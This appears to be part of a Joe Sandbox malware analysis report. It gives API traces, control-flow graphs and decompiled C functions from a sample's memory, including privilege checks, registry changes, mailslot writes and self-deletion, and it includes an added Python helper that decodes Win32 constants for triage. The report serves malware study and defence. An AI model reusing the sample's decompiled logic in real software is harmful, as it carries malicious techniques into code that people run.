                        • Part of subcall function 01412BE1: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000000,?,01413082,?,?,?), ref: 01412C1D
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C43
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C5C
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C62
                        • Part of subcall function 01412BE1: SetEndOfFile.KERNELBASE(?,?,01413082,?,?,?), ref: 01412C6E
                        • Part of subcall function 01412BE1: CloseHandle.KERNEL32(?), ref: 01412C77
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C7F
                        • Part of subcall function 01412BE1: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,01413082,?,?,?), ref: 01412C9E
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(00000000,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412CB4
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CBA
                        • Part of subcall function 01412BE1: FlushFileBuffers.KERNEL32(00000000), ref: 01412CC4
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CCC
                      • lstrcpy.KERNEL32(?,?), ref: 014130AC
                      • RegCreateKeyA.ADVAPI32(?,?,?), ref: 014130C0
                      • RegQueryValueExA.KERNEL32(?,01418256,00000000,?,?,01414321), ref: 014130E3
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 01413146
                      • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01413161
                      • RegDeleteValueW.ADVAPI32(?,014176D0), ref: 0141316F
                      • RegCloseKey.ADVAPI32(?), ref: 01413178
                      • RegCloseKey.ADVAPI32(?), ref: 01413181
                      • HeapFree.KERNEL32(00000000,00000000), ref: 014131B9
                      • RegCloseKey.ADVAPI32(?), ref: 014131CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Create$CloseErrorHeapLastValuelstrlen$OpenQueryWritelstrcpy$AllocateDirectoryFree$BuffersDeleteFlushHandlelstrcmpimemcpymemsetwsprintf
                      • String ID: (
                      • API String ID: 1564632544-3887548279
                      • Opcode ID: 1a38ba26e3e0a01cb3276bc36ce3c62e736cbc250f54ff09a52783f1d8f8d93c
                      • Instruction ID: 37342f20720eda081279f15aadd8ccd52218fe64ebe70db543d8a2c77bbb9cfb
                      • Opcode Fuzzy Hash: 1a38ba26e3e0a01cb3276bc36ce3c62e736cbc250f54ff09a52783f1d8f8d93c
                      • Instruction Fuzzy Hash: C09136B190020AFFDF22DF95DC88DAF7FB9FB04351B11446AFA05A2228D7709A55DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                        • Part of subcall function 014129A4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01417614,014116B0,?,01417614), ref: 014129B3
                        • Part of subcall function 014129A4: GetVersion.KERNEL32(?,01417614), ref: 014129C2
                        • Part of subcall function 014129A4: GetCurrentProcessId.KERNEL32(?,01417614), ref: 014129D1
                        • Part of subcall function 014129A4: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01417614), ref: 014129EA
                      • WaitForSingleObject.KERNEL32(00000040), ref: 014116D2
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                      • CloseHandle.KERNEL32(00000000), ref: 01411966
                        • Part of subcall function 014115FB: CreateFileW.KERNELBASE(0141763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01411611
                        • Part of subcall function 014115FB: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01417614), ref: 01411627
                        • Part of subcall function 014115FB: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01417614), ref: 0141163F
                        • Part of subcall function 014115FB: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01417614), ref: 01411651
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141165F
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141166C
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,01417614), ref: 0141167B
                        • Part of subcall function 0141144F: LoadLibraryA.KERNEL32(USER32.DLL), ref: 0141145E
                        • Part of subcall function 0141144F: GetModuleHandleA.KERNEL32(USER32.DLL,01418000,?,?,0141178B,00000000,?,01417614), ref: 01411484
                        • Part of subcall function 0141144F: FindWindowA.USER32(01418640,00000000,?,?,0141178B,00000000,?,01417614), ref: 0141149A
                        • Part of subcall function 0141144F: GetWindowThreadProcessId.USER32(00000000,00000000,?,?,0141178B,00000000,?,01417614), ref: 014114A5
                      • GetLastError.KERNEL32(pnls,00000000,?,01417614), ref: 0141197D
                        • Part of subcall function 01411189: HeapFree.KERNEL32(00000000,?,Local\), ref: 0141121A
                      • lstrcatW.KERNEL32(014184B8,pnls), ref: 014117FD
                      • LocalFree.KERNEL32(?), ref: 01411970
                        • Part of subcall function 01411227: PathFindFileNameW.SHLWAPI(0141618C), ref: 01411249
                        • Part of subcall function 01411227: lstrcmpiW.KERNELBASE(00000000,?,01417614), ref: 01411250
                        • Part of subcall function 01411227: RegOpenKeyExA.KERNEL32(80000001,01418080,00000000,00000000,?,?,01417614), ref: 01411281
                        • Part of subcall function 01411227: lstrlenW.KERNEL32(?,01417614), ref: 01411295
                        • Part of subcall function 01411227: RtlAllocateHeap.NTDLL(00000000,?), ref: 014112AD
                        • Part of subcall function 01411227: RegQueryValueExW.KERNEL32(?,00000000,01417614,00000000,01417614,?,01417614), ref: 014112CC
                        • Part of subcall function 01411227: StrStrIW.SHLWAPI(00000000), ref: 014112E9
                        • Part of subcall function 01411227: HeapFree.KERNEL32(00000000,00000000), ref: 014112FE
                        • Part of subcall function 01411227: RegCloseKey.ADVAPI32(?,?,01417614), ref: 01411307
                        • Part of subcall function 01413E06: OpenProcessToken.ADVAPI32(000000FF,00020008,01417614,00000000), ref: 01413E38
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000014,00000001,00000004,?,00000000), ref: 01413E58
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000019,00000000,00000000,?), ref: 01413E68
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000019,00000000,?,?,?,0141618C), ref: 01413E8B
                        • Part of subcall function 01413E06: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01413E93
                        • Part of subcall function 01413E06: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01413EA3
                        • Part of subcall function 01413E06: CloseHandle.KERNEL32(01417614), ref: 01413EB8
                        • Part of subcall function 01412D8C: memset.NTDLL ref: 01412DAA
                        • Part of subcall function 01412D8C: CoInitializeEx.OLE32(00000000,00000002), ref: 01412DB5
                        • Part of subcall function 01412D8C: PathFindExtensionW.SHLWAPI(00000000), ref: 01412DD0
                        • Part of subcall function 01412D8C: lstrcpyW.KERNEL32(00000000,01418224), ref: 01412DE5
                        • Part of subcall function 01412D8C: lstrlen.KERNEL32(01417614,?,?,?,?,?,?,?,?,?,?,01411853,?), ref: 01412E02
                        • Part of subcall function 01412D8C: lstrcpyW.KERNEL32(00000000,014184B8), ref: 01412E33
                        • Part of subcall function 01412D8C: wsprintfW.USER32 ref: 01412E6A
                        • Part of subcall function 01412D8C: ShellExecuteExW.SHELL32(0000003C), ref: 01412E9F
                        • Part of subcall function 01412D8C: CoUninitialize.OLE32 ref: 01412EB3
                        • Part of subcall function 01412CDF: lstrlenW.KERNEL32(00000000,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01412D1A
                        • Part of subcall function 01412CDF: PathFindFileNameW.SHLWAPI(00000000), ref: 01412D32
                        • Part of subcall function 01412CDF: lstrcatW.KERNEL32(00000000,?), ref: 01412D5B
                        • Part of subcall function 0141131A: memset.NTDLL ref: 01411323
                        • Part of subcall function 0141131A: HeapFree.KERNEL32(00000000,?,?), ref: 01411392
                      • CreateEventA.KERNEL32(?,00000001,00000000), ref: 01411898
                      • GetLastError.KERNEL32 ref: 014118A9
                      • SetEvent.KERNEL32(00000000), ref: 014118B4
                      • Sleep.KERNEL32(00000BB8), ref: 014118BF
                      • ResetEvent.KERNEL32(00000000), ref: 014118C6
                      • CloseHandle.KERNEL32(00000000), ref: 014118CD
                        • Part of subcall function 01414253: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,01417614), ref: 0141427A
                        • Part of subcall function 01414253: RegEnumKeyExA.KERNEL32(00000000,?,00000000,01417614,00000000,00000000,00000000,00000000,00000104,00000000,?,01417614), ref: 014142C1
                        • Part of subcall function 01414253: WaitForSingleObject.KERNEL32(00000000,?), ref: 0141432E
                        • Part of subcall function 01414253: RegCloseKey.ADVAPI32(?,00000104,00000000,?,01417614), ref: 01414356
                      • DeleteFileW.KERNELBASE(0141763C,?), ref: 01411906
                      • MoveFileExW.KERNEL32(00000000,00000004), ref: 01411919
                        • Part of subcall function 01413C1B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 01413C4C
                        • Part of subcall function 01413C1B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 01413C85
                      • CreateWaitableTimerA.KERNEL32(?,00000001,?), ref: 0141193C
                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0141195F
                        • Part of subcall function 01414365: lstrcpyn.KERNEL32(014116FE,014161F4,00000008,0141618C,0000000C,00000000,?,?,?,014116FE,?,?,01417614), ref: 01414393
                        • Part of subcall function 01414365: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,014116FE,?,?,01417614), ref: 01414406
                        • Part of subcall function 01414365: memcpy.NTDLL(?,00000000,?,?,01417614,00000001,?,?,?,014116FE,?,?,01417614), ref: 0141444F
                        • Part of subcall function 01414365: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,01417614,00000001,?,?,?,014116FE,?), ref: 01414468
                      • ExitProcess.KERNEL32 ref: 0141198E
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Process$CloseError$CreateFreeHandleLastOpen$EventFindHeapInformationToken$Pathlstrlen$AuthorityNameObjectQuerySingleTimerVirtualWaitWaitableWindowlstrcatlstrcpymemset$AllocAllocateCountCurrentDeleteEnumExecuteExitExtensionInitializeLibraryLoadLocalMappingModuleMoveResetShellSizeSleepStatusSystemThreadUninitializeValueVersionViewWow64lstrcmpilstrcpynmemcpywsprintf
                      • String ID: pnls
                      • API String ID: 348821020-141991303
                      • Opcode ID: 6664c124fe14476b25b4814e684dde4cd510ca4833dda5a84943fd6c6b21149b
                      • Instruction ID: e66ff923b8bd2e3dcd0329a736682125043192577e990bbfccfd252e77e6a9a3
                      • Opcode Fuzzy Hash: 6664c124fe14476b25b4814e684dde4cd510ca4833dda5a84943fd6c6b21149b
                      • Instruction Fuzzy Hash: E281D0B25043029FDB20AF79DC88A6B7BB9AB54B20F01492EFB55D627CDB70C844CB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 186 1412be1-1412bfb 187 1412c00-1412c2b CreateFileW 186->187 188 1412bfd 186->188 189 1412c2d-1412c47 WriteFile 187->189 190 1412c7f-1412c85 GetLastError 187->190 188->187 191 1412c62-1412c68 GetLastError 189->191 192 1412c49-1412c60 WriteFile 189->192 193 1412c88-1412c8d 190->193 196 1412c6b-1412c7d SetEndOfFile CloseHandle 191->196 192->191 192->196 194 1412cd5-1412cdc 193->194 195 1412c8f-1412ca5 CreateFileW 193->195 197 1412ca7-1412cb8 WriteFile 195->197 198 1412ccc-1412cd2 GetLastError 195->198 196->193 199 1412cc3-1412cca FlushFileBuffers 197->199 200 1412cba-1412cc0 GetLastError 197->200 198->194 199->194 200->199
                      APIs
                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000000,?,01413082,?,?,?), ref: 01412C1D
                      • WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C43
                      • WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C5C
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C62
                      • SetEndOfFile.KERNELBASE(?,?,01413082,?,?,?), ref: 01412C6E
                      • CloseHandle.KERNEL32(?), ref: 01412C77
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C7F
                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,01413082,?,?,?), ref: 01412C9E
                      • WriteFile.KERNELBASE(00000000,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412CB4
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CBA
                      • FlushFileBuffers.KERNEL32(00000000), ref: 01412CC4
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CCC
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Write$Create$BuffersCloseFlushHandle
                      • String ID:
                      • API String ID: 2625730619-0
                      • Opcode ID: 7e84ebfecaf1f660278f7a971d47815a8f4b37528e9c1e97b8c836477edf95e9
                      • Instruction ID: b4cecd15b7adb10f694ea5831447a2b7dd17809c60c2963ac3fb8e3c17a4adc7
                      • Opcode Fuzzy Hash: 7e84ebfecaf1f660278f7a971d47815a8f4b37528e9c1e97b8c836477edf95e9
                      • Instruction Fuzzy Hash: 7A312F71900209FFEB10DFA4CD45EAEBF79EB48750F118155FA11E72A4E7B09A419B60
                      Uniqueness

                      Uniqueness Score: -1,00%
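                      The argument columns in the APIs lists above are raw hex as the HCA plugin recovered them from the stack ("?" where it could not, and trailing values past the documented parameter count are simply what was on the stack). Reading them needs the Win32 constants: the CreateFileW at 01412C1D, for example, is GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, OPEN_ALWAYS, and the second CreateFileW at 01412C9E differs only in using OPEN_EXISTING. The Python below is an added triage helper and is not part of the Joe Sandbox report or of the sample: it parses one API bullet and decodes the arguments for the calls that recur in this report (file access and disposition, registry hive, VirtualAlloc type and protection, token access and information class, NtQuerySystemInformation class, Sleep interval). The constant tables are the documented values from the Windows SDK headers; the parameter positions assume the documented prototypes, and the sample lines are copied from this report.

```python
import re

# One "APIs" bullet as this report renders it, for example
#   CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 01412C1D
#   GetLastError.KERNEL32 ref: 014118A9
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX = re.compile(r"^[0-9A-Fa-f]+$")

# Win32 constants (Windows SDK headers) for the arguments that recur in this trace.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
FREE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
TOKEN_ACCESS = {0x20000: "READ_CONTROL", 0x0008: "TOKEN_QUERY",
                0x0002: "TOKEN_DUPLICATE", 0x0020: "TOKEN_ADJUST_PRIVILEGES"}
TOKEN_CLASS = {20: "TokenElevation", 25: "TokenIntegrityLevel"}
SYSINFO = {5: "SystemProcessInformation"}

# api name -> {argument index: (parameter name, table, kind)}; kind is "flags"
# (OR-ed bits), "enum" (exact value) or "ms" (a Sleep interval).
DECODERS = {
    "CreateFileW": {1: ("dwDesiredAccess", GENERIC, "flags"),
                    2: ("dwShareMode", SHARE, "flags"),
                    4: ("dwCreationDisposition", DISPOSITION, "enum")},
    "RegOpenKeyExA": {0: ("hKey", HIVES, "enum")},
    "VirtualAlloc": {2: ("flAllocationType", ALLOC, "flags"),
                     3: ("flProtect", PROTECT, "enum")},
    "VirtualFree": {2: ("dwFreeType", FREE, "flags")},
    "OpenProcessToken": {1: ("DesiredAccess", TOKEN_ACCESS, "flags")},
    "GetTokenInformation": {1: ("TokenInformationClass", TOKEN_CLASS, "enum")},
    "NtQuerySystemInformation": {0: ("SystemInformationClass", SYSINFO, "enum")},
    "Sleep": {0: ("dwMilliseconds", None, "ms")},
}
DECODERS["CreateFileA"] = DECODERS["CreateFileW"]
DECODERS["RegOpenKeyExW"] = DECODERS["RegOpenKeyExA"]


def decode_flags(value, table):
    """Name every bit of value found in table; any leftover bits stay as hex."""
    names, covered = [], 0
    for bit, name in table.items():
        if (value & bit) == bit:
            names.append(name)
            covered |= bit
    if value & ~covered:
        names.append(f"0x{value & ~covered:X}")
    return "|".join(names) if names else "0"


def parse_args(text):
    """'?' is a value the plugin could not recover; hex tokens become ints; strings stay."""
    if not text:
        return []
    out = []
    for tok in text.split(","):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
        elif HEX.match(tok):
            out.append(int(tok, 16))
        else:
            out.append(tok)
    return out


def decode_api_line(line):
    """Parse one APIs bullet; the leading bullet or 'Part of subcall function' prefix is skipped."""
    m = API_LINE.search(line)
    if not m:
        return None
    api, args, decoded = m.group("api"), parse_args(m.group("args")), {}
    for idx, (pname, table, kind) in DECODERS.get(api, {}).items():
        if idx >= len(args) or not isinstance(args[idx], int):
            continue
        v = args[idx]
        if kind == "flags":
            decoded[pname] = decode_flags(v, table)
        elif kind == "enum":
            decoded[pname] = table.get(v, f"0x{v:X}")
        else:
            decoded[pname] = f"{v} ms"
    return {"api": api, "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args, "decoded": decoded}


def describe(line):
    """One readable line per API bullet, suitable for triage notes."""
    r = decode_api_line(line)
    if r is None:
        return ""
    dec = ", ".join(f"{k}={v}" for k, v in r["decoded"].items())
    return f"{r['api']} [{r['module']}] @ {r['ref']:08X}" + (f": {dec}" if dec else "")


# Sample input: lines copied from the APIs lists in this report.
SAMPLE_LINES = [
    "CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000000,?,01413082,?,?,?), ref: 01412C1D",
    "RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,01417614), ref: 0141427A",
    "VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,014116FE,?,?,01417614), ref: 01414406",
    "OpenProcessToken.ADVAPI32(000000FF,00020008,01417614,00000000), ref: 01413E38",
    "GetTokenInformation.KERNELBASE(01417614,00000019,00000000,00000000,?), ref: 01413E68",
    "Sleep.KERNEL32(00000BB8), ref: 014118BF",
    "GetLastError.KERNEL32 ref: 014118A9",
]


def summarize(lines=SAMPLE_LINES):
    return [describe(l) for l in lines if describe(l)]


if __name__ == "__main__":
    print("\n".join(summarize()))
```

                      Running the file prints the decoded sample lines; summarize() accepts the report's bullets as pasted, since the regex skips the bullet and the "Part of subcall function ...:" prefix. Two decodings worth noting when reading this report: OpenProcessToken with 00020008 is READ_CONTROL|TOKEN_QUERY, and the GetTokenInformation classes 00000014 and 00000019 are TokenElevation and TokenIntegrityLevel, so the function at 01413E38 (further down) is checking whether the process is elevated and which integrity level it runs at.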

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E00401649(intOrPtr __eax, long _a4) {
                      				void* _v8;
                      				long _v12;
                      				void* _v16;
                      				void _v28;
                      				void* __ebx;
                      				void* _t29;
                      				void* _t34;
                      				long _t45;
                      				void* _t47;
                      
                      				 *0x40305c = __eax;
                      				_v28 = _a4;
                      				 *0x403268 = 0x736c6e70; // executed
                      				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
                      				_v8 = _t29;
                      				if(_t29 == 0) {
                      					_a4 = GetLastError();
                      				} else {
                      					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
                      					_t47 = _t34;
                      					_v16 = _t47;
                      					if(_t47 == 0) {
                      						_a4 = GetLastError();
                      					} else {
                      						_a4 = 0;
                      						WaitForSingleObject(_t47, 0xffffffff); // executed
                      						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
                      							TerminateThread(_v8, _a4);
                      						} else {
                      							WaitForSingleObject(_v8, 0xffffffff);
                      							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
                      								_t45 = E004015A3( &_v28); // executed
                      								_a4 = _t45;
                      							}
                      						}
                      						CloseHandle(_v16);
                      					}
                      					CloseHandle(_v8);
                      				}
                      				return _a4;
                      			}

                      Instruction addresses for the C code above, one per body line in order (0x00000000 marks a line with no instruction of its own): 0x00401657 0x0040165f 0x00401674 0x0040167e 0x00401680 0x00401685 0x00401723 0x0040168b 0x0040169c 0x0040169e 0x004016a0 0x004016a5 0x0040170e 0x004016a7 0x004016b0 0x004016b3 0x004016c4 0x004016f7 0x004016cb 0x004016d0 0x004016dd 0x004016e7 0x004016ec 0x004016ec 0x004016dd 0x00401700 0x00401700 0x00401714 0x0040171a 0x0040172c

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                      • CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                      • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                      • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 004015A3: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                      • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                      • CloseHandle.KERNEL32(?), ref: 00401700
                      • GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                      • CloseHandle.KERNEL32(?), ref: 00401714
                      • GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleWait$AllocTerminateVirtual
                      • String ID:
                      • API String ID: 2781294418-0
                      • Opcode ID: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction ID: 87f03f665843337bf68fe172ccf2670ca8cb997910dba5155611d0e3495f720c
                      • Opcode Fuzzy Hash: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction Fuzzy Hash: 2E31FC71800209FBDB11DFA5DD858EE7BBCEB49350B208137FA05F61A0D6749A44DBA8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 216 4010fb-401104 217 401107-401124 CreateFileA 216->217 218 401126-401137 GetLastError Sleep 217->218 219 401139 217->219 220 40113c-401140 218->220 219->220 220->217 221 401142-401145 220->221 222 4011ea-4011ef 221->222 223 40114b-40115f call 40172f 221->223 226 401161-401169 223->226 227 4011da 223->227 229 40116e-401173 226->229 228 4011e1-4011e4 CloseHandle 227->228 228->222 230 401175 229->230 231 401178-401192 WriteFile 229->231 230->231 232 401194-40119c 231->232 233 4011a8-4011b4 GetLastError 231->233 235 4011b6-4011c0 Sleep 232->235 236 40119e-4011a0 232->236 234 4011c2-4011d8 memset call 401207 233->234 233->235 234->228 235->229 235->234 236->235 237 4011a2-4011a6 236->237 237->235
                      C-Code - Quality: 94%
                      			E004010FB(void* __ebx, void* __edi, void* _a4) {
                      				struct _SECURITY_ATTRIBUTES* _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _v24;
                      				void* _t28;
                      				void* _t34;
                      				int _t39;
                      				long _t40;
                      				long _t43;
                      				void* _t45;
                      				long _t46;
                      				void* _t48;
                      				void* _t52;
                      
                      				_t48 = __edi;
                      				_t45 = __ebx;
                      				_v8 = 0;
                      				do {
                      					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
                      					_v20 = _t28;
                      					if(_t28 != 0xffffffff) {
                      						_v12 = 0;
                      					} else {
                      						_v12 = GetLastError();
                      						Sleep(0x64);
                      					}
                      				} while (_v12 == 2);
                      				if(_v12 != 0) {
                      					L19:
                      					return _v12;
                      				}
                      				_t34 = E0040172F( *_a4,  &_a4,  &_v24); // executed
                      				if(_t34 == 0) {
                      					_v12 = 0xb;
                      					L18:
                      					CloseHandle(_v20);
                      					goto L19;
                      				}
                      				_t52 = _a4;
                      				_push(_t45);
                      				_t46 = _v24;
                      				_push(_t48);
                      				do {
                      					_v16 = _t46;
                      					if(_t46 >= 0x1000) {
                      						_v16 = 0x1000;
                      					}
                      					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
                      					if(_t39 == 0) {
                      						_t40 = GetLastError();
                      						_v12 = _t40;
                      						if(_t40 != 0x79) {
                      							break;
                      						}
                      					} else {
                      						_t43 = _v16;
                      						_v8 = _v8 + _t43;
                      						_t46 = _t46 - _t43;
                      						if(_t46 == 0 && _t43 == 0x1000) {
                      							_t46 = _t46 + 1;
                      							_v8 = _v8 - 1;
                      						}
                      					}
                      					Sleep(0x64); // executed
                      				} while (_t46 != 0);
                      				memset(_t52, 0, _v8);
                      				E00401207(_t52);
                      				goto L18;
                      			}

                      Instruction addresses for the C code above, one per body line in order (0x00000000 marks a line with no instruction of its own): 0x004010fb 0x004010fb 0x00401104 0x00401107 0x00401118 0x0040111e 0x00401124 0x00401139 0x00401126 0x0040112e 0x00401131 0x00401131 0x0040113c 0x00401145 0x004011ea 0x004011ef 0x004011ef 0x00401158 0x0040115f 0x004011da 0x004011e1 0x004011e4 0x00000000 0x004011e4 0x00401161 0x00401164 0x00401165 0x00401168 0x0040116e 0x0040116e 0x00401173 0x00401175 0x00401175 0x0040118a 0x00401192 0x004011a8 0x004011ae 0x004011b4 0x00000000 0x00000000 0x00401194 0x00401194 0x00401197 0x0040119a 0x0040119c 0x004011a2 0x004011a3 0x004011a3 0x0040119c 0x004011b8 0x004011be 0x004011c8 0x004011d1 0x00000000

                      APIs
                      • CreateFileA.KERNELBASE(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
                      • GetLastError.KERNEL32 ref: 00401126
                      • Sleep.KERNEL32(00000064), ref: 00401131
                        • Part of subcall function 0040172F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401818
                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040118A
                      • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
                      • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
                      • memset.NTDLL ref: 004011C8
                        • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401599,00401599), ref: 00401213
                      • CloseHandle.KERNEL32(?), ref: 004011E4
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
